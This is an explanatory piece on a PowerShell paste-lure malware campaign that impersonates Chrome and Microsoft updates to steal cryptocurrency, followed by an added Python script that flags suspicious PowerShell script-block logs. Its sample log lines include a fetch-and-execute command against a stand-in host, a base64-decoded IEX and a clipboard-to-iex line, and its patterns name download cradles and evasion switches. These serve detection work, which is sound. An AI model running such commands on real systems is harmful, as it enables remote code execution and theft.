PowerShell plays a crucial role in the malware's attack chain because it is the interpreter that runs the malicious code the user has been lured into fetching. The attackers behind the malware trick users into opening PowerShell and pasting in the harmful code, which then gains access to the victim's cryptocurrency and sensitive files. By abusing PowerShell, attackers can bypass traditional security measures and hide their malicious activity inside a legitimate, signed system process, making detection more challenging.
The malware impersonates Google Chrome and Microsoft applications by mimicking their update prompts and programs. On Google Chrome, it appears as a fake update prompt on a compromised website, instructing users to copy a code snippet and paste it into PowerShell. For Microsoft applications, it sends emails containing HTML files that resemble Microsoft Word with fake error messages, prompting users to open PowerShell and paste in malicious code. The malware also impersonates OneDrive, Microsoft's cloud storage service, as another lure.
The malware gains access to the victim's cryptocurrencies and sensitive personal information through a multi-stage process. It starts by impersonating Google Chrome and Microsoft updates, prompting users to copy and run a malicious sequence of code. Once that code runs, it behaves like a Trojan horse, giving the attackers access to the victim's cryptocurrency and sensitive files. The malware reroutes the victim's funds to the attacker and exposes personal information. The initial foothold relies on social engineering, such as clipboard-based prompts and email lures, which trick users into opening PowerShell and pasting in the malicious code.
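Because the chain described above depends on a user pasting attacker-supplied code into PowerShell, the most direct detection point for defenders is PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The following added example, which is not code from the original article or from any vendor, shows a small triage routine that scores logged script blocks by how many independent indicator families co-occur (download cradle, in-memory execution, base64-encoded payload, evasion switches, clipboard reads). The log line format, hostnames, usernames, URLs and the base64 string are all constructed for this example; the only real identifiers are the event ID and the PowerShell cmdlet and switch names being matched.

```python
import re

# Constructed sample entries in a flattened key=value form modelled loosely on
# Event ID 4104 (script block logging). Hosts, users, URLs and the base64
# string are made up; they are not indicators from the article.
SAMPLE_LOG_LINES = [
    "2024-05-01T10:22:13Z EventID=4104 Host=WS01 User=alice ScriptBlockText=Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "2024-05-01T10:23:40Z EventID=4104 Host=WS01 User=alice ScriptBlockText=Invoke-WebRequest -Uri https://intranet.example.invalid/report.csv -OutFile C:\\Temp\\report.csv",
    "2024-05-01T11:02:05Z EventID=4104 Host=WS07 User=bob ScriptBlockText=iwr 'http://chrome-update.example.invalid/verify.ps1' -UseBasicParsing | iex",
    "2024-05-01T11:02:06Z EventID=4103 Host=WS07 User=bob ScriptBlockText=(pipeline logging, not a script block)",
    "2024-05-01T13:45:51Z EventID=4104 Host=WS12 User=dave ScriptBlockText=IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QUFBQQ==')))",
    "2024-05-01T14:10:19Z EventID=4104 Host=WS03 User=erin ScriptBlockText=Get-Clipboard | iex",
]

# Parser for the constructed line format above; ScriptBlockText is the remainder of the line.
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+EventID=(?P<eid>\d+)\s+Host=(?P<host>\S+)\s+User=(?P<user>\S+)\s+ScriptBlockText=(?P<sb>.*)$"
)

# Indicator families. Each one alone is common in legitimate administration;
# the signal is several of them appearing in the same script block.
INDICATORS = {
    "download_cradle": re.compile(
        r"Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Net\.WebClient|DownloadString|Start-BitsTransfer", re.I),
    "in_memory_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "encoded_payload": re.compile(r"FromBase64String|-EncodedCommand\b|-enc\b", re.I),
    "evasion_flags": re.compile(
        r"-(WindowStyle|w)\s+Hidden|-(ExecutionPolicy|ep)\s+Bypass|-NoProfile\b|-nop\b", re.I),
    "clipboard_read": re.compile(r"Get-Clipboard|Clipboard\]::GetText", re.I),
}


def parse_line(line):
    """Return a dict for a 4104 script block event, or None for other event IDs or unparsable lines."""
    m = LOG_LINE.match(line)
    if not m or m.group("eid") != "4104":
        return None
    return {"ts": m.group("ts"), "host": m.group("host"),
            "user": m.group("user"), "script": m.group("sb")}


def classify(script_block):
    """Return the set of indicator family names that fire on one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_block)}


def triage(lines, min_categories=2):
    """Flag script blocks where at least `min_categories` distinct families co-occur.

    A lone download (an admin fetching a CSV to disk) is not enough on its own;
    a download piped straight into Invoke-Expression, or clipboard contents
    piped into iex as in a paste-this-into-PowerShell lure, is.
    """
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        hits = classify(ev["script"])
        if len(hits) >= min_categories:
            alerts.append({**ev, "indicators": sorted(hits)})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_LOG_LINES):
        print(f"{a['ts']} {a['host']} {a['user']}: {', '.join(a['indicators'])}")
```

On the constructed sample, the two lines from `alice` (a directory listing and a plain file download) produce no alert, the 4103 line is ignored by the parser, and the three script blocks that combine a fetch, a decode or a clipboard read with in-memory execution are flagged. In production the same `classify` logic would run over the real `ScriptBlockText` field pulled from the event log, and the threshold can be raised or the families weighted once a baseline of legitimate administrative scripts is known.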